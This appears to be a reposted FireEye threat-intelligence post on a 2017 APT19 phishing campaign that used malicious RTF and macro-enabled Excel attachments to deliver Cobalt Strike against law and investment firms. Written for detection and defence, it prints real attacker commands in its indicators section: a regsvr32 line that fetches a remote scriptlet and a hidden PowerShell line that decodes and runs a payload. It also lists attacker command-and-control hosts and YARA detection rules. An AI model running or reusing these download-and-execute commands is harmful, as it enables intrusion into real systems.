Privileges and Credentials: Phished at the Request of Counsel

Summary

In May and June 2017, FireEye observed a phishing campaign targeting
at least seven global law and investment firms. We have associated
this campaign with APT19, a group that we assess is composed of
freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise
targets. In early May, the phishing lures leveraged RTF attachments
that exploited the Microsoft Windows vulnerability described in CVE
2017-0199
. Toward the end of May, APT19 switched to using
macro-enabled Microsoft Excel (XLSM) documents. In the most recent
versions, APT19 added an application whitelisting bypass to the XLSM
documents. At least one observed phishing lure delivered a Cobalt
Strike payload.

As of the writing of this blog post, FireEye had not observed
post-exploitation activity by the threat actors, so we cannot assess
the goal of the campaign. We have previously observed APT19 steal data
from law and investment firms for competitive economic purposes.

This purpose of this blog post is to inform law firms and investment
firms of this phishing campaign and provide technical indicators that
their IT personnel can use for proactive hunting and detection.

The Emails

APT19 phishing emails from this campaign originated from sender
email accounts from the “@cloudsend[.]net” domain and used a
variety of subjects and attachment names. Refer to the Indicators of
Compromise section for more details.

The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft
Excel (XLSM) files to deliver their initial exploits. The following
sections describe the two methods in further detail.

RTF Attachments

Through the exploitation of the HTA handler vulnerability described
in CVE-2017-1099,
the observed RTF attachments download
hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file
was no longer hosted at tk-in-f156.2bunny[.]com for further analysis.
Figure 1 is a screenshot of a packet capture showing one of the RTF
files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP

XLSM Attachments

The XLSM attachments contained multiple worksheets with content that
reflected the attachment name. The attachments also contained an image
that requested the user to “Enable Content”, which would enable macro
support if it was disabled. Figure 2 provides a screenshot of one of
the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a
macro that:

  1. Determined the system architecture to select the correct path
    for PowerShell
  2. Launched a ZLIB compressed and Base64
    encoded command with PowerShell. This is a typical technique used by
    Meterpreter stagers.

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSX Macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

The shellcode invokes PowerShell to issue a HTTP GET request for a
random four (4) character URI on the root of
autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP
headers since the PowerShell command is executed with mostly default
parameters. Figure 5 depicts an HTTP GET request generated by the
payload, with minimal HTTP headers.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable
characters provides a quick way to pull out network-based indicators
(NBI) from the shellcode. Figure 6 shows the extracted NBIs.

Figure 6: Decoded shellcode

FireEye also identified an alternate macro in some of the XLSM
documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey
Smith’s “Squiblydoo” Application Whitelisting bypass
technique
to run the command in Figure 8.

Figure 8: Application Whitelisting Bypass

The command in Figure 8 downloads and launches code within an SCT
file. The SCT file in the payload (MD5:
1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the “$DoIt” string,
which is usually indicative of a Cobalt Strike payload.

Figure 10: Decoded SCT contents

A quick conversion of the contents of the variable “$var_code” from
Base64 to ASCII shows some familiar network indicators, shown in
Figure 11.

Figure 11: $var_code to ASCII

Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a
typical Cobalt Strike BEACON payload, configured with the following parameters:

  • Process Inject Targets:
    • %windir%\syswow64\rundll32.exe
    • %windir%\sysnative\rundll32.exe
  • c2_user_agents
    • Mozilla/5.0 (compatible; MSIE 9.0;
      Windows NT 6.1; Trident/5.0; FunWebProducts;
      IE0006_ver1;EN_GB)
  • Named Pipes
    • \\%s\pipe\msagent_%x
  • beacon_interval
    • 60
  • C2
    • autodiscover.2bunny[.]com/submit.php
    • autodiscover.2bunny[.]com/IE9CompatViewList.xml
    • sfo02s01-in-f2.cloudsend[.]net/submit.php
    • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • C2 Port
    • TCP/80

Figure 12 depicts an example of a BEACON C2 attempt from this payload.

Figure 12: Cobalt Strike BEACON C2

FireEye Product Detections

The following FireEye products currently detect and block the
methods described above. Table 1 lists the current detection and
blocking capabilities by product.

Detection Name

Product

Action

Notes

SUSPICIOUS POWERSHELL USAGE
(METHODOLOGY)

HX

Detect

XSLM Macro launch

Gen:Variant.Application.HackTool.CobaltStrike.1

HX

Detect

XSLM Macro launch

Malware Object

HX

Detect

BEACON written to disk

Backdoor.BEACON

NX

Block*

BEACON Callback

FE_Malformed_RTF

EX/ETP/NX

Block*

RTF

Malware.Binary.rtf

EX/ETP/NX

Block*

RTF

Malware.Binary

EX/ETP/NX

Block*

RTF

Malware.Binary.xlsx

EX/ETP/NX

Block*

XSLM

Table 1: Detection review

*Appliances must be configured for block mode.

Recommendations

FireEye recommends organizations perform the following steps to
mitigate the risk of this campaign:

  1. Microsoft Office users should apply the patch
    from Microsoft
    as soon as possible, if they have not already
    installed it.
  2. Search historic and future emails that match
    the included indicators of compromise.
  3. Review web proxy
    logs for connections to the included network based indicators of
    compromise.
  4. Block connections to the included fully qualified
    domain names.
  5. Review endpoints for the included host based
    indicators of compromise.

Indicators of Compromise

The following section provides the IOCs for the variants of the
phishing emails and malicious payloads that FireEye has observed
during this campaign.

Email Senders
  • PressReader <infodept@cloudsend[.]net>
  • Angela
    Suh <angela.suh@cloudsend[.]net>
  • Ashley Safronoff
    <ashley.safronoff@cloudsend[.]net>
  • Lindsey Hersh
    <lindsey.hersh@cloudsend[.]net>
  • Sarah Roberto
    sarah.roberto@cloudsend[.]net
  • noreply@cloudsend[.]net
Email Subject Lines
  • Macron Denies Authenticity Of Leak, French Prosecutors Open
    Probe
  • Macron Document Leaker Releases New Images, Promises
    More Information
  • Are Emmanuel Macron’s Tax Evasion
    Documents Real?
  • Time Allocation
  • Vacancy
    Report
  • china paper table and graph
  • results with
    zeros – some ready not all finished
  • Macron Leaks contain
    secret plans for the islamisation of France and Europe
Attachment Names
  • Macron_Authenticity.doc.rtf
  • Macron_Information.doc.rtf
  • US and EU Trade with China and
    China CA.xlsm
  • Tables 4 5 7 Appendix with zeros.xlsm
  • Project Codes – 05.30.17.xlsm
  • Weekly Vacancy Status
    Report 5-30-15.xlsm
  • Macron_Tax_Evasion.doc.rtf
  • Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
  • lyncdiscover.2bunny[.]com
  • autodiscover.2bunny[.]com
  • lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
  • lyncdiscover.2bunny[.]com/Autodiscover
  • autodiscover.2bunny[.]com/K5om
  • sfo02s01-in-f2.cloudsend[.]net/submit.php
  • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • tk-in-f156.2bunny[.]com
  • tk-in-f156.2bunny[.]com/Agreement.doc
  • 104.236.77[.]169
  • 138.68.45[.]9
  • 162.243.143[.]145
  • Mozilla/5.0 (compatible; MSIE 9.0;
    Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)
Host Based Indicators (HBI)

RTF MD5 hash values

  • 0bef39d0e10b1edfe77617f494d733a8
  • 0e6da59f10e1c4685bb5b35a30fc8fb6
  • cebd0e9e05749665d893e78c452607e2

XLSX MD5 hash values

  • 38125a991efc6ab02f7134db0ebe21b6
  • 3a1dca21bfe72368f2dd46eb4d9b48c4
  • 30f149479c02b741e897cdb9ecd22da7

BEACON and Meterpreter payload MD5 hash values

  • bae0b39197a1ac9e24bdf9a9483b18ea
  • 1151619d06a461456b310096db6bc548

Process arguments, named pipes, and file paths

  • powershell.exe -NoP -NonI -W Hidden -Command
    “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object
    IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
    (,$([Convert]::FromBase64String(“<base64
    blob>”)
  • regsvr32.exe /s /n /u
    /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll
  • \\<ip>\pipe\msagent_<4 digits>
  • C:\Documents
    and Settings\<user>\Local Settings\Temp\K5om.dll (4 character
    DLL based on URI of original GET request)
Yara Rules

rule FE_LEGALSTRIKE_MACRO {
       meta:version=”.1″
     
 filetype=”MACRO”
     
 author=”Ian.Ahl@fireeye.com @TekDefense”
   
   date=”2017-06-02″
     
 description=”This rule is designed to identify macros
with the specific encoding used in the sample
30f149479c02b741e897cdb9ecd22da7.”
strings:
 
     // OBSFUCATION
       $ob1 = “ChrW(114) &
ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118)
& ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46)
& ChrW(101)” ascii wide
       $ob2 =
“ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47)
& ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110)
& ChrW(32) & ChrW(47)” ascii wide
     
 $ob3 = “ChrW(117) & ChrW(32) & ChrW(47) &
ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) &
ChrW(116) & ChrW(112) & ChrW(115)” ascii
wide
       $ob4 = “ChrW(58) & ChrW(47) &
ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) &
ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)”
ascii wide
       $ob5 = “ChrW(99) & ChrW(111)
& ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46)
& ChrW(50) & ChrW(98) & ChrW(117) &
ChrW(110)” ascii wide
       $ob6 = “ChrW(110)
& ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111)
& ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117)
& ChrW(116)” ascii wide
       $ob7 =
“ChrW(111) & ChrW(100) & ChrW(105) &
ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) &
ChrW(101) & ChrW(114) & ChrW(32)” ascii
wide
       $ob8 = “ChrW(115) & ChrW(99) &
ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) &
ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)”
ascii wide
       $obreg1 =
/(\w{5}\s&\s){7}\w{5}/
       $obreg2 =
/(Chrw\(\d{1,3}\)\s&\s){7}/
       // wscript
       $wsobj1 = “Set Obj =
CreateObject(\”WScript.Shell\”)” ascii
wide
       $wsobj2 = “Obj.Run ” ascii
wide

condition:
        (
             
(
                      (uint16(0) != 0x5A4D)
   
          )
              and
             
(
                      all of ($wsobj*) and 3 of
($ob*)
                      or
                 
    all of ($wsobj*) and all of ($obreg*)
             
)
       )
}

 

rule FE_LEGALSTRIKE_MACRO_2 {
 
     meta:version=”.1″
     
 filetype=”MACRO”
     
 author=”Ian.Ahl@fireeye.com @TekDefense”
     
 date=”2017-06-02″
       description=”This
rule was written to hit on specific variables and powershell
command fragments as seen in the macro found in the XLSX
file3a1dca21bfe72368f2dd46eb4d9b48c4.”
strings:
       // Setting the environment
       $env1 =
“Arch = Environ(\”PROCESSOR_ARCHITECTURE\”)”
ascii wide
       $env2 = “windir =
Environ(\”windir\”)” ascii wide
     
 $env3 = “windir +
\”\\syswow64\\windowspowershell\\v1.0\\powershell.exe\””
ascii wide
       // powershell command fragments
 
     $ps1 = “-NoP” ascii wide
       $ps2 =
“-NonI” ascii wide
       $ps3 = “-W
Hidden” ascii wide
       $ps4 = “-Command”
ascii wide
       $ps5 = “New-Object
IO.StreamReader” ascii wide
       $ps6 =
“IO.Compression.DeflateStream” ascii wide
     
 $ps7 = “IO.MemoryStream” ascii wide
       $ps8
= “,$([Convert]::FromBase64String” ascii wide
 
     $ps9 = “ReadToEnd();” ascii wide
     
 $psregex1 = /\W\w+\s+\s\”.+\”/
condition:
       (
              (
                     
(uint16(0) != 0x5A4D)
              )
             
and
              (
                      all of
($env*) and 6 of ($ps*)
                      or
   
                  all of ($env*) and 4 of ($ps*) and all of
($psregex*)
              )
       )
}

 

rule FE_LEGALSTRIKE_RTF {
 
  meta:
        version=”.1″
       
filetype=”MACRO”
       
author=”joshua.kim@FireEye.com”
       
date=”2017-06-02″
       
description=”Rtf Phishing Campaign leveraging the CVE
2017-0199 exploit, to point to the domain
2bunnyDOTcom”

    strings:
        $header =
“{\\rt”

        $lnkinfo =
“4c0069006e006b0049006e0066006f”

       
$encoded1 = “4f4c45324c696e6b”
       
$encoded2 =
“52006f006f007400200045006e007400720079”
     
  $encoded3 = “4f0062006a0049006e0066006f”
   
    $encoded4 = “4f006c0065”

        $http1 =
“68{“
        $http2 = “74{“
 
      $http3 = “07{“

        //
2bunny.com
        $domain1 = “32{\\”
 
      $domain2 = “62{\\”
        $domain3 =
“75{\\”
        $domain4 =
“6e{\\”
        $domain5 =
“79{\\”
        $domain6 =
“2e{\\”
        $domain7 =
“63{\\”
        $domain8 =
“6f{\\”
        $domain9 =
“6d{\\”

        $datastore =
“\\*\\datastore”

    condition:
       
$header at 0 and all of them
}

Acknowledgements

Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms,
Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer

from Privileges and Credentials: Phished at the Request of Counsel

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s